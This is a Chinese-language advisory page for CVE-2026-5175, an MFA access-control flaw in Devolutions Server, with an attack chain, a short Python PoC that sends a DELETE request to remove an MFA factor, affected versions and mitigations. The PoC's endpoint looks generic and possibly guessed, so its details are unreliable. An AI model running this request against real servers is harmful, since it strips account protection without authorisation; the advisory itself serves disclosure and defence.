CVE-2026-5175 CVSS 5.0 中危

CVE-2026-5175 Devolutions Server MFA访问控制漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5175

漏洞类型

访问控制失效

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Devolutions Server

漏洞概述

Devolutions Server的多因素认证（MFA）管理API存在访问控制不当漏洞。该漏洞允许经过身份验证的攻击者通过特制的HTTP请求删除其自身配置的MFA验证因子。成功利用此漏洞将导致账户保护级别降低，仅依赖密码认证，从而增加了账户被劫持的风险。

技术细节

该漏洞源于Devolutions Server在处理MFA管理API请求时未实施严格的访问控制验证。虽然攻击者需要具备低权限账户（PR:L），但系统未能正确校验用户是否有权执行删除MFA因子的操作，或者允许用户绕过某些限制。攻击者可以通过发送特制的HTTP DELETE请求指向MFA管理接口，利用这一逻辑缺陷移除账户关联的MFA因子。由于CVSS向量中的范围指标为S:C（Changed），该漏洞可能影响同一基础结构上的其他组件安全性。攻击过程无需用户交互（UI:N），一旦利用成功，账户的完整性（I:L）将受到破坏。

攻击链分析

STEP 1

1. 信息收集

攻击者获取Devolutions Server的低权限账户凭据。

STEP 2

2. 身份认证

攻击者使用获取的凭据登录系统，获取有效的Session或API Token。

STEP 3

3. 漏洞利用

攻击者构造恶意HTTP DELETE请求发送至MFA管理API接口，目标是删除其账户绑定的MFA因子。

STEP 4

4. 达成效果

服务器响应请求，MFA因子被移除，账户安全性降级，仅受密码保护。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-5175: Improper Access Control in MFA Management API
# Warning: For educational purposes only. Do not use against systems without permission.

target_url = "https://<target-server>/api/v1/mfa/factors/{factor_id}"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Authorization": "Bearer <valid_auth_token>",
    "Accept": "application/json"
}

# Attempt to delete the MFA factor associated with the authenticated user
try:
    response = requests.delete(target_url, headers=headers)
    if response.status_code == 204:
        print("[+] Success: MFA factor removed. Account protection reduced to password-only.")
    elif response.status_code == 200:
        print("[+] Success: Server acknowledged the removal of MFA factor.")
    else:
        print(f"[-] Failed: HTTP {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Devolutions Server 2026.1.6

Devolutions Server 2026.1.7

Devolutions Server 2026.1.8

Devolutions Server 2026.1.9

Devolutions Server 2026.1.10

Devolutions Server 2026.1.11

防御指南

临时缓解措施

如果无法立即升级，建议管理员暂时禁用用户自助管理MFA的功能，或通过网络安全策略（如WAF）限制对MFA API接口的访问，仅允许受信任的管理终端IP进行调用，并密切监控审计日志中关于MFA配置变更的操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5175
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5175
3 Details https://www.cvedetails.com/cve/CVE-2026-5175/
4 VulDB https://vuldb.com/cve/CVE-2026-5175
5 Link https://devolutions.net/security/advisories/DEVO-2026-0010

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表